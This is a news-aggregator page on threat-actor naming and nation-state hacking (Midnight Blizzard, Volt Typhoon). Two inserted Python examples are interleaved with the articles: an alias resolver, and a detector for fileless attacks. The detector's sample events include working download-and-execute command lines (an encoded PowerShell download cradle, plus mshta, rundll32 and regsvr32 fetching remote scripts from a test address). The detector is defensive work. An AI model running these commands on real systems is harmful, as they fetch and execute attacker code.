
Latest news with #MidnightBlizzard

CrowdStrike and Microsoft Collaborate to Harmonize Cyber Threat Attribution

Yahoo

4 days ago

  • Business
  • Yahoo

Landmark industry collaboration maps threat actor aliases across vendors to accelerate response and strengthen global cyberdefense

AUSTIN, Texas, June 02, 2025--(BUSINESS WIRE)--CrowdStrike (NASDAQ: CRWD) and Microsoft today announced a collaboration to bring clarity and coordination to how cyber threat actors are identified and tracked across security vendors. By mapping threat actor aliases and aligning adversary attribution across platforms, the collaboration minimizes confusion caused by different naming systems and accelerates cyber defenders' response against today's and tomorrow's most sophisticated adversaries.

The cybersecurity industry has developed multiple naming systems for threat actors, each grounded in unique vantage points, intelligence sources, and analytic rigor. These taxonomies provide critical adversary context to help organizations understand the threats they face, who is targeting them, and why. But as the adversary landscape grows, so does the complexity of cross-vendor attribution.

Through this deeper collaboration, CrowdStrike and Microsoft have developed a shared mapping system – a 'Rosetta Stone' for cyber threat intelligence – that links adversary identifiers across vendor ecosystems without mandating a single naming standard. By reducing ambiguity in how adversaries are labeled, this mapping enables defenders to make faster, more confident decisions, correlate threat intelligence across sources, and better disrupt threat actor activity before it causes harm. By making it easier to connect naming conventions like COZY BEAR and Midnight Blizzard, the mapping supports quicker decision-making and unified threat response across taxonomies.

"This is a watershed moment for cybersecurity. Adversaries hide behind both technology and the confusion created by inconsistent naming. As defenders, it's our job to stay ahead and to give security teams clarity on who is targeting them and how to respond. This has been CrowdStrike's mission from day one," said Adam Meyers, Head of Counter Adversary Operations at CrowdStrike. "CrowdStrike is the leader in adversary intelligence, and Microsoft brings one of the most valuable data sources on adversary behavior. Together, we're combining strengths to deliver clarity, speed, and confidence to defenders everywhere."

The collaboration will start with a shared analyst-led effort to harmonize adversary naming between CrowdStrike and Microsoft's threat research teams. Through this collaboration, the companies have already deconflicted more than 80 adversaries, including confirming that Microsoft's Volt Typhoon and CrowdStrike's VANGUARD PANDA are the same Chinese state-sponsored threat actor, and that Secret Blizzard and VENOMOUS BEAR refer to the same Russia-nexus adversary. This demonstrates the real-world value of shared attribution. Moving forward, CrowdStrike and Microsoft will continue working together to expand this effort, inviting other partners to contribute to and maintain a shared threat actor mapping resource for the global cybersecurity community.

"Cybersecurity is a defining challenge of our time, especially in today's AI-driven era," said Vasu Jakkal, Corporate Vice President, Microsoft Security. "Microsoft and CrowdStrike are in ideal positions to help our customers, and the wider defender community accelerate the benefits of actionable threat intelligence. Security is a team sport and when defenders can share and react to information faster it makes a difference in how we protect the world."

This collaboration builds on each company's deep history of threat intelligence leadership and advances a shared mission: delivering better outcomes for defenders by putting customers first and the mission before the market. To learn more about the CrowdStrike and Microsoft collaboration on cyber threat attribution, please visit our blog.

About CrowdStrike: CrowdStrike (NASDAQ: CRWD), a global cybersecurity leader, has redefined modern security with the world's most advanced cloud-native platform for protecting critical areas of enterprise risk – endpoints and cloud workloads, identity and data. Powered by the CrowdStrike Security Cloud and world-class AI, the CrowdStrike Falcon® platform leverages real-time indicators of attack, threat intelligence, evolving adversary tradecraft and enriched telemetry from across the enterprise to deliver hyper-accurate detections, automated protection and remediation, elite threat hunting and prioritized observability of vulnerabilities. Purpose-built in the cloud with a single lightweight-agent architecture, the Falcon platform delivers rapid and scalable deployment, superior protection and performance, reduced complexity and immediate time-to-value. CrowdStrike: We stop breaches.

© 2025 CrowdStrike, Inc. All rights reserved. CrowdStrike and CrowdStrike Falcon are marks owned by CrowdStrike, Inc. and are registered in the United States and other countries. CrowdStrike owns other trademarks and service marks and may use the brands of third parties to identify their products and services.
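What a "Rosetta Stone" of this kind looks like in code, as an added example: this is not CrowdStrike's or Microsoft's code, and the vendor tags, the sample reports and the 203.0.113.0/24 indicators are assumptions. Only the alias pairs the release names (COZY BEAR and Midnight Blizzard, VANGUARD PANDA and Volt Typhoon, VENOMOUS BEAR and Secret Blizzard) and the APT29 equivalence stated in the Trellix item further down this page come from the page. The point it shows is that equivalences can be merged transitively without electing any vendor's name as canonical, and that a correlation across vendors' reports can then be keyed on the resolved cluster rather than on whichever name each vendor used.

```python
"""Cross-vendor threat-actor alias resolution (added example; not CrowdStrike's or
Microsoft's code). The alias pairs come from this page; the vendor tags, the
sample reports and the 203.0.113.0/24 indicators are constructed."""
from collections import defaultdict
from typing import Dict, Iterable, List, Set, Tuple

Label = Tuple[str, str]  # (vendor, actor name)

# Equivalences named on the page. Tagging APT29 as "mandiant" is an assumption;
# the page only says "APT29, also known as Midnight Blizzard".
PAGE_ALIAS_PAIRS: List[Tuple[Label, Label]] = [
    (("crowdstrike", "COZY BEAR"), ("microsoft", "Midnight Blizzard")),
    (("crowdstrike", "VANGUARD PANDA"), ("microsoft", "Volt Typhoon")),
    (("crowdstrike", "VENOMOUS BEAR"), ("microsoft", "Secret Blizzard")),
    (("mandiant", "APT29"), ("microsoft", "Midnight Blizzard")),
]


class AliasResolver:
    """Union-find over vendor labels. No vendor's name is made canonical; a
    cluster is just the set of labels that have been declared equivalent."""

    def __init__(self) -> None:
        self._parent: Dict[Label, Label] = {}
        self._display: Dict[Label, str] = {}  # normalised key -> name as first seen

    @staticmethod
    def key(vendor: str, name: str) -> Label:
        # Case- and whitespace-insensitive, so "Cozy Bear" resolves like "COZY BEAR".
        return (vendor.strip().lower(), " ".join(name.split()).lower())

    def _find(self, k: Label) -> Label:
        root = k
        while self._parent[root] != root:
            root = self._parent[root]
        while self._parent[k] != root:  # path compression
            self._parent[k], k = root, self._parent[k]
        return root

    def add(self, vendor: str, name: str) -> Label:
        k = self.key(vendor, name)
        if k not in self._parent:
            self._parent[k] = k
            self._display[k] = name.strip()
        return k

    def link(self, a: Label, b: Label) -> None:
        ra, rb = self._find(self.add(*a)), self._find(self.add(*b))
        if ra != rb:
            self._parent[rb] = ra

    def cluster(self, vendor: str, name: str) -> Set[Label]:
        k = self.key(vendor, name)
        if k not in self._parent:
            return set()
        root = self._find(k)
        return {x for x in self._parent if self._find(x) == root}

    def aliases(self, vendor: str, name: str) -> Dict[str, str]:
        """vendor -> display name for every vendor that tracks this actor."""
        return {v: self._display[(v, n)] for (v, n) in self.cluster(vendor, name)}

    def canonical(self, vendor: str, name: str) -> Label:
        """Deterministic cluster id (smallest label). Unmapped names map to
        themselves so a correlation never silently drops them."""
        cl = self.cluster(vendor, name)
        return min(cl) if cl else self.key(vendor, name)

    def conflicts(self) -> List[Set[Label]]:
        """Clusters where one vendor contributes two names. A vendor keeping two
        names usually means it sees two actors, so this flags a suspect merge."""
        by_root: Dict[Label, Set[Label]] = defaultdict(set)
        for k in self._parent:
            by_root[self._find(k)].add(k)
        return [m for m in by_root.values() if len({v for v, _ in m}) < len(m)]


def build_resolver(pairs: Iterable[Tuple[Label, Label]] = PAGE_ALIAS_PAIRS) -> AliasResolver:
    res = AliasResolver()
    for a, b in pairs:
        res.link(a, b)
    return res


# Constructed reports: each vendor names the actor its own way; the last has no mapping.
SAMPLE_REPORTS = [
    {"vendor": "microsoft", "actor": "Midnight Blizzard", "indicator": "203.0.113.10"},
    {"vendor": "crowdstrike", "actor": "Cozy Bear", "indicator": "203.0.113.11"},
    {"vendor": "mandiant", "actor": "APT29", "indicator": "203.0.113.12"},
    {"vendor": "microsoft", "actor": "Volt Typhoon", "indicator": "203.0.113.20"},
    {"vendor": "crowdstrike", "actor": "EXAMPLE ACTOR", "indicator": "203.0.113.30"},
]


def correlate(resolver: AliasResolver, reports) -> Dict[Label, List[str]]:
    """Merge indicators from several vendors' reports by resolved actor."""
    merged: Dict[Label, List[str]] = defaultdict(list)
    for rep in reports:
        merged[resolver.canonical(rep["vendor"], rep["actor"])].append(rep["indicator"])
    return dict(merged)
```

Two design points worth carrying into a real implementation. First, `conflicts()` is the check to run every time a mapping is updated: if a merge puts two of one vendor's names into the same cluster, either the source mapping is wrong or that vendor deliberately splits the activity, and either way an analyst should look before the correlation is trusted. Second, `canonical()` returns the unmapped label itself rather than dropping it, so reports about actors the mapping does not yet cover still surface in the merged view instead of disappearing.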

CrowdStrike & Microsoft unify naming for cyber threat actors

Techday NZ

4 days ago

  • Techday NZ

CrowdStrike and Microsoft have jointly introduced a new initiative aimed at standardising the way cyber threat actors are identified across the cybersecurity sector. The collaboration has resulted in a shared mapping system, aligning threat actor aliases between the two companies and promoting clarity in cyber threat attribution. Both companies state that this initiative is designed to accelerate threat response and reduce confusion caused by the inconsistent nicknames used for hacker groups among different security vendors.

The cybersecurity industry has historically relied on disparate naming systems, each informed by distinct intelligence sources and analytical approaches. While these systems provide valuable context on adversaries, they can complicate cross-referencing and response due to conflicting terminology. This increased complexity has prompted the need for a unified approach to threat actor attribution.

CrowdStrike and Microsoft's joint mapping project serves as a form of 'Rosetta Stone' for cyber threat intelligence, linking adversary identifiers across their respective ecosystems without imposing a single nomenclature. By connecting aliases, such as CrowdStrike's COZY BEAR and Microsoft's Midnight Blizzard, or VANGUARD PANDA and Volt Typhoon, the mapping facilitates quicker and better-coordinated responses to sophisticated adversaries.

According to CrowdStrike, the partners have already reconciled over 80 threat group aliases. The alignment extends to groups linked to major nation-state actors. For example, the companies have confirmed that Microsoft's Volt Typhoon and CrowdStrike's VANGUARD PANDA refer to the same China-nexus actor, while Secret Blizzard and VENOMOUS BEAR designate a Russia-linked group.

Adam Meyers, Head of Counter Adversary Operations at CrowdStrike, commented on the significance of the collaboration. "This is a watershed moment for cybersecurity. Adversaries hide behind both technology and the confusion created by inconsistent naming. As defenders, it's our job to stay ahead and to give security teams clarity on who is targeting them and how to respond. This has been CrowdStrike's mission from day one," Meyers said. "CrowdStrike is the leader in adversary intelligence, and Microsoft brings one of the most valuable data sources on adversary behavior. Together, we're combining strengths to deliver clarity, speed, and confidence to defenders everywhere."

The initial phase of the collaboration involves specialist teams from both companies working together to harmonise adversary naming conventions. The effort has already demonstrated practical value by validating the identities of specific threat actors across the two ecosystems. The companies will seek to expand this initiative, inviting additional contributors to create and maintain a broader threat actor mapping resource accessible to the global cybersecurity community.

Vasu Jakkal, Corporate Vice President for Microsoft Security, emphasised the broader implications for the security sector. "Cybersecurity is a defining challenge of our time, especially in today's AI-driven era," Jakkal said. "Microsoft and CrowdStrike are in ideal positions to help our customers, and the wider defender community accelerate the benefits of actionable threat intelligence. Security is a team sport and when defenders can share and react to information faster it makes a difference in how we protect the world."

The companies note that their collaboration builds on an established history of threat intelligence activity and contributes towards a shared mission: prioritising customer outcomes and sector-wide defence, rather than market competition. The mapping initiative will continue to develop as more partners join to keep the threat actor taxonomy up to date and useful for the defender community.

CrowdStrike and Microsoft Collaborate to Harmonize Cyber Threat Attribution

Business Wire

4 days ago

  • Business
  • Business Wire


Cyberthreats surge against US logistics infrastructure

Yahoo

09-05-2025

  • Business
  • Yahoo

Cybersecurity provider Trellix recently released its April 'CyberThreat Report' revealing an alarming rise in cyberattacks targeting critical U.S. infrastructure, with the freight and logistics sectors now in the crosshairs of nation-state actors and sophisticated ransomware groups. Between October 2024 and March 2025, the U.S. saw a 136% increase in Advanced Persistent Threat (APT) activity: prolonged, targeted intrusions in which an attacker gains unauthorized access to a network and remains undetected for an extended period.

Of particular concern is the role of APT29, also known as Midnight Blizzard, a well-documented cyber espionage group linked to the Russian Foreign Intelligence Service. Known for its stealthy, high-level campaigns, APT29 specializes in long-term intrusions that exfiltrate sensitive data without immediate detection. Trellix researchers report that 55% of APT29's observed activity in this period specifically targeted the transportation and shipping sectors, signaling a coordinated focus on disrupting or surveilling supply chain operations. For logistics professionals, this suggests that state-sponsored actors are probing for weaknesses not just in physical infrastructure, but also in the digital ecosystems that support freight visibility, scheduling and warehouse management.

Meanwhile, ransomware continues to plague U.S. organizations, with 58% of all global ransomware-related posts traced back to U.S.-based attacks. This reflects an environment where financially motivated criminal groups are increasingly exploiting known and zero-day vulnerabilities, bypassing phishing emails in favor of more direct and technical exploits. More troubling still is the evolution in attacker methods. Rather than relying on suspicious email attachments, cybercriminals now favor fileless malware that runs only in memory and abuses legitimate, signed Windows tools (so-called living-off-the-land binaries) to execute, which makes the activity far harder to catch with traditional file-scanning antivirus.
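Because fileless, living-off-the-land execution leaves no malicious file for a scanner to hash, the practical detection surface is process-creation telemetry: which signed binary ran, what its parent was, and what its command line asked it to do. The block below is an added example of that kind of detection logic and is not code from Trellix or FreightWaves. The events are constructed (loosely modelled on Sysmon Event ID 1 fields), and the hostnames, rule set and the 203.0.113.5 address (an RFC 5737 test range) are assumptions. It decodes PowerShell's `-EncodedCommand` payload before judging it, and catches the classic script-host abuses of mshta, rundll32 and regsvr32 plus an Office application spawning a shell.

```python
"""Process-creation detections for the fileless / LOLBin tradecraft described above.
Added example, not code from Trellix or FreightWaves. Events are constructed and
loosely modelled on Sysmon Event ID 1 fields; hostnames and the 203.0.113.5
address (RFC 5737 test range) are assumptions, not observed data."""
import base64
import re
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional, Tuple


@dataclass(frozen=True)
class ProcessEvent:
    host: str
    parent_image: str
    image: str
    command_line: str


def _exe(path: str) -> str:
    """Lower-cased basename of an image path, tolerant of either slash."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


# PowerShell accepts any unambiguous prefix of -EncodedCommand; try longest first.
_ENC_FLAG = re.compile(r"(?:^|\s)[-/](?:encodedcommand|enc|en|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.I)
_HOSTILE_PS = re.compile(r"invoke-expression|\biex\b|downloadstring|downloadfile|frombase64string|invoke-webrequest", re.I)
_REMOTE_OR_INLINE = re.compile(r"https?://|(?:javascript|vbscript):", re.I)
_SCRIPT_HOSTS = {"mshta.exe", "rundll32.exe"}
_OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
_SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe", "rundll32.exe"}


def decode_encoded_command(command_line: str) -> Optional[str]:
    """Plaintext of a -EncodedCommand payload (base64 over UTF-16LE), or None."""
    m = _ENC_FLAG.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def _encoded_powershell(ev: ProcessEvent) -> Optional[str]:
    # Encoded commands alone are noisy (deployment tooling uses them), so key on
    # what the payload does once decoded rather than on the flag itself.
    if _exe(ev.image) not in {"powershell.exe", "pwsh.exe"}:
        return None
    decoded = decode_encoded_command(ev.command_line)
    if decoded and _HOSTILE_PS.search(decoded):
        return "encoded command decodes to: " + decoded[:60]
    return None


def _script_host_remote_or_inline(ev: ProcessEvent) -> Optional[str]:
    # mshta fetching an .hta over HTTP, or rundll32/mshta given javascript:/vbscript: inline.
    if _exe(ev.image) in _SCRIPT_HOSTS and _REMOTE_OR_INLINE.search(ev.command_line):
        return f"{_exe(ev.image)} loading remote or inline script"
    return None


def _regsvr32_remote_scriptlet(ev: ProcessEvent) -> Optional[str]:
    cl = ev.command_line.lower()
    if _exe(ev.image) == "regsvr32.exe" and re.search(r"/i:\s*https?://", cl) and "scrobj" in cl:
        return "regsvr32 registering a remote scriptlet through scrobj.dll"
    return None


def _office_spawns_shell(ev: ProcessEvent) -> Optional[str]:
    if _exe(ev.parent_image) in _OFFICE and _exe(ev.image) in _SHELLS:
        return f"{_exe(ev.parent_image)} spawned {_exe(ev.image)}"
    return None


RULES: List[Tuple[str, str, Callable[[ProcessEvent], Optional[str]]]] = [
    ("encoded_powershell", "high", _encoded_powershell),
    ("script_host_remote_or_inline", "high", _script_host_remote_or_inline),
    ("regsvr32_remote_scriptlet", "high", _regsvr32_remote_scriptlet),
    ("office_spawns_shell", "medium", _office_spawns_shell),
]


def scan(events: List[ProcessEvent]) -> List[Dict[str, str]]:
    """Run every rule over every event; one finding per (event, rule) hit."""
    findings: List[Dict[str, str]] = []
    for ev in events:
        for name, severity, rule in RULES:
            detail = rule(ev)
            if detail:
                findings.append({"host": ev.host, "rule": name, "severity": severity, "detail": detail})
    return findings


# Constructed sample; the first payload is encoded exactly as PowerShell expects it.
_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/s.ps1')"
_ENCODED = base64.b64encode(_PAYLOAD.encode("utf-16-le")).decode("ascii")
_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcessEvent("wh-01", r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE", _PS,
                 f"powershell.exe -nop -w hidden -enc {_ENCODED}"),
    ProcessEvent("tms-02", r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
                 "mshta.exe http://203.0.113.5/l.hta"),
    ProcessEvent("tms-02", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\rundll32.exe",
                 'rundll32.exe javascript:"\\..\\mshtml,RunHTMLApplication ";document.write();'),
    ProcessEvent("yard-03", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\regsvr32.exe",
                 "regsvr32 /s /n /u /i:http://203.0.113.5/x.sct scrobj.dll"),
    ProcessEvent("wh-01", r"C:\Windows\explorer.exe", _PS,  # benign: normal parent, script on disk
                 r"powershell.exe -File C:\Scripts\inventory.ps1"),
]
```

Run `scan(SAMPLE_EVENTS)` and the Word-spawned encoded PowerShell produces two findings (the decoded download cradle and the Office-to-shell parent relationship), the three script-host events one each, and the administrator's `-File` invocation none. The decode step is the part worth keeping: matching on the `-enc` flag alone would page on every legitimate deployment script, while matching on the decoded text catches the cradle however the operator chose to encode it.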
Learn more about these cybersecurity threats in the Trellix report.

How did Flexport's Convoy platform achieve zero thefts over the past 380,000 loads booked? Dooner asked the guy who runs it on a recent episode of WHAT THE TRUCK?!? Here's what Bill Driegert, head of trucking, had to say:

Lt. George Ackerman of the Philadelphia Police Department was no stranger to crime trends, but when tractor trailers filled with beef, booze, crab legs and TVs began disappearing at an alarming rate in 2022, even his decades of experience couldn't explain the scale. What began as sporadic cargo thefts ballooned into a citywide epidemic, particularly across Philly's 8th District, where over 180 thefts were eventually reported. The goods, often worth millions, vanished without a trace, with no suspects, no patterns and no product ever recovered. Ackerman, a former trucker himself, became the lead on what would become the city's largest cargo theft case in modern history.

At first, detectives assumed it was a string of isolated jobs. But the thieves always seemed to know exactly where to strike, regardless of drivers' unique schedules. A breakthrough came in April 2023, when Ackerman responded to a robbery involving over 2 million U.S. dimes stolen from a U.S. Mint trailer. Surveillance footage showed a highly coordinated team, including scouts, lookouts and loaders, operating in sync. Ackerman and his team, with support from the FBI, Secret Service and state police, slowly began to unravel the group. Cell tower data, surveillance footage and even Coinstar deposits pointed to a tightly knit crew based in the area. Their incriminating texts, bragging about 'liquor and cow feet' dinners, confirmed their role in more than $1.5 million in thefts. Learn more about Ackerman's detective work from Philadelphia magazine here.

The post Cyberthreats surge against US logistics infrastructure appeared first on FreightWaves.

The White House's risky cyberoffense stand-down

Washington Post

05-03-2025

  • Politics
  • Washington Post

'Stand down' is an order that military leaders fear. But that's what Defense Secretary Pete Hegseth reportedly ordered U.S. Cyber Command to do in its operations and planning against Russia, as part of President Donald Trump's efforts to cajole the Kremlin into making a peace deal with Ukraine. The order to pause offensive cyberoperations, first reported Friday by the Record, may be the most dramatic example of Trump's eagerness to woo Russian President Vladimir Putin. And it raised alarm among a half-dozen former senior national security officials I talked with Monday. The Pentagon hasn't responded to the story except to say that it does not 'discuss cyber intelligence, plans, or operations.'

The stand-down order isn't dangerous in itself, officials tell me. This is the kind of sweetener that often accompanies diplomatic efforts. When the United States wants to foster negotiations, it will cancel military exercises or halt provocative overflights — or occasionally, as in the case of Trump's summitry with North Korea in 2018 and 2019, suspend offensive cyberoperations.

But beware: Cyberoperations may be the most valuable weapons in today's national security arsenal. They're the essential tool in collecting intelligence, and they can cripple an adversary's military operations and economic stability. Once a president begins making concessions in this area, he risks giving up U.S. power in a domain where, for all Russia's and China's efforts, the United States remains dominant.

Understanding what's at stake in the cyber realm is hard, because the activities of Cyber Command and its civilian partner, the National Security Agency, are so secret. But the basics were outlined in a 2020 article in Foreign Affairs by Gen. Paul Nakasone, then head of Cyber Command and the NSA, and Michael Sulmeyer, his senior adviser. They explained that in cyberspace, the United States maintains 'persistent engagement' — meaning that conflict with adversaries isn't an on-off switch, but more like a rheostat you can dial up or down. And it's normally at about three, officials tell me. We're always at a low level of cyberwar with Russia and China, in other words.

The NSA and Cyber Command are constantly inside Russian servers — gathering intelligence, monitoring threats and planting tools for future use. 'We stay engaged. We stay in the network. We see what malware they're developing,' said one former senior official. And sometimes, as in responding to last year's Russian sabotage campaign against NATO supporters of Ukraine, the United States has probably taken offensive action to disrupt threats.

Russia and China, meanwhile, are constantly attacking the United States, often to devastating effect. If you doubt it, take a look at Microsoft's regular reports on the Russian intelligence operation it calls 'Midnight Blizzard,' which over the past two years hacked into hundreds of sensitive organizations. Or read up on the Chinese 'Salt Typhoon' and 'Volt Typhoon' attacks that have burrowed into our telecommunications companies and critical infrastructure.

The cyber experts I consulted don't know for sure what Hegseth's order means in practice. It appears to apply only to Cyber Command's offensive hacking — and not to the NSA's intelligence gathering. But the two are intertwined. The NSA will penetrate a Russian network to collect information and, in the process, detect a threat or vulnerability and share that information with Cyber Command. Sometimes, the dual-hatted commander of the two organizations must decide whether to preserve the intel source or take it down. The fear is that limits on Cyber Command may bleed into NSA operations.

Then there's the question of how long this operational pause will last. Experts fear that if it lasts more than a month, Cyber Command will start losing essential threads. It's hard to recover access points and signatures. And there's lost human contact, too. The Cyber Command doctrine is to 'hunt forward' — meaning to send cyberwarriors to friendly countries where Russian networks may be easier to access. Those ties could wither, too.

Finally, cyber experts worry that Trump, in his deepening embrace of Putin, may contemplate a bigger deal that would amount to disarmament in cyberspace. That's a dangerous mistake for two reasons, experts say: The United States is ahead in cyber and would lose this advantage, and any deal in this domain would be unverifiable.

The easiest way to illustrate the perils of Trump's tilt toward Russia is to recall a similar experience, the U.S.-Russia 'reset' attempted by President Barack Obama when Dmitry Medvedev was Russia's president. For a trip down bad-memory lane, take a look at the Obama team's 11-page summary in 2010 of its reset agenda, whose initiatives all crashed and burned when Putin regained the presidency in 2012. Trump probably wouldn't like to think he's emulating Obama, but that's a fact.

The Kremlin is crowing that Trump's version of a Moscow-friendly peace deal on Ukraine 'largely aligns with our vision.' That should frighten anyone who has studied Putin's attempts to redraw the security map in Europe. In 1987, in his book 'The Art of the Deal,' Trump had it right: 'The worst thing you can possibly do in a deal is seem desperate to make it. That makes the other guy smell blood, and then you're dead.' He should follow his own advice — especially when it comes to lowering our cyberdefenses.
